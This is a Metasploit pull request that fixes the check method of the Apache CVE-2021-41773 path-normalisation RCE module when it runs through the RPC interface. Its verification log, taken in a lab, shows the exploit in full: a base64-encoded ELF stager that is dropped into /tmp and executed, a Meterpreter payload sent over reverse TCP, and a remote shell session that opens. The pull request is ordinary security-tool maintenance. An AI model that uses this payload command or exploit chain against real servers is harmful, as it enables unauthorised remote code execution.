Closed adfoster-r7 closed 2 weeks ago
Fixes a bug in apache_normalize_path_rce's check method via the RPC interface
Verification
Set up a target for RCE
https://github.com/rapid7/metasploit-framework/blob/2dce73833f6d8d458ed789a4a4b8a2a91c28bd47/documentation/modules/auxiliary/scanner/http/apache_normalize_path.md?plain=1#L24-L30
msf6 exploit(multi/http/apache_normalize_path_rce) > rerun rhost=192.168.123.1 lhost=192.168.123.1 rport=8080 ssl=false cve=CVE-2021-41773
[*] Reloading module...
[*] Started reverse TCP handler on 192.168.123.1:4444
[*] Using auxiliary/scanner/http/apache_normalize_path as check
[+] http://192.168.123.1:8080 - The target is vulnerable to CVE-2021-41773 (mod_cgi is enabled).
[*] Scanned 1 of 1 hosts (100% complete)
[*] http://192.168.123.1:8080 - Attempt to exploit for CVE-2021-41773
[*] http://192.168.123.1:8080 - Sending linux/x64/meterpreter/reverse_tcp command payload
[*] http://192.168.123.1:8080 - Generated command payload: echo f0VMRgIBAQAAAAAAAAAAAAIAPgABAAAAeABAAAAAAABAAAAAAAAAAAAAAAAAAAAAAAAAAEAAOAABAAAAAAAAAAEAAAAHAAAAAAAAAAAAAAAAAEAAAAAAAAAAQAAAAAAA+gAAAAAAAAB8AQAAAAAAAAAQAAAAAAAAMf9qCViZthBIidZNMclqIkFaagdaDwVIhcB4UWoKQVlQailYmWoCX2oBXg8FSIXAeDtIl0i5AgARXMCoewFRSInmahBaaipYDwVZSIXAeSVJ/8l0GFdqI1hqAGoFSInnSDH2DwVZWV9IhcB5x2o8WGoBXw8FXmp+Wg8FSIXAeO3/5g== | base64 -d > /tmp/SzoTkiR; chmod +x /tmp/SzoTkiR; /tmp/SzoTkiR; rm -f /tmp/SzoTkiR
[*] Transmitting intermediate stager...(126 bytes)
[*] Sending stage (3045380 bytes) to 192.168.123.1
[*] Meterpreter session 12 opened (192.168.123.1:4444 -> 192.168.123.1:49301) at 2024-05-01 20:06:43 +0100
Ensure the module works via RPC (i.e. Metasploit Pro)
Before
Check method failed, because the CHECK_RCE method wasn't defaulted correctly for the CheckModule method to work
After
Session opened
This fixes an issue in the exploit/multi/http/apache_normalize_path_rce exploit module that affected Metasploit Pro due to how the module was handling datastore options.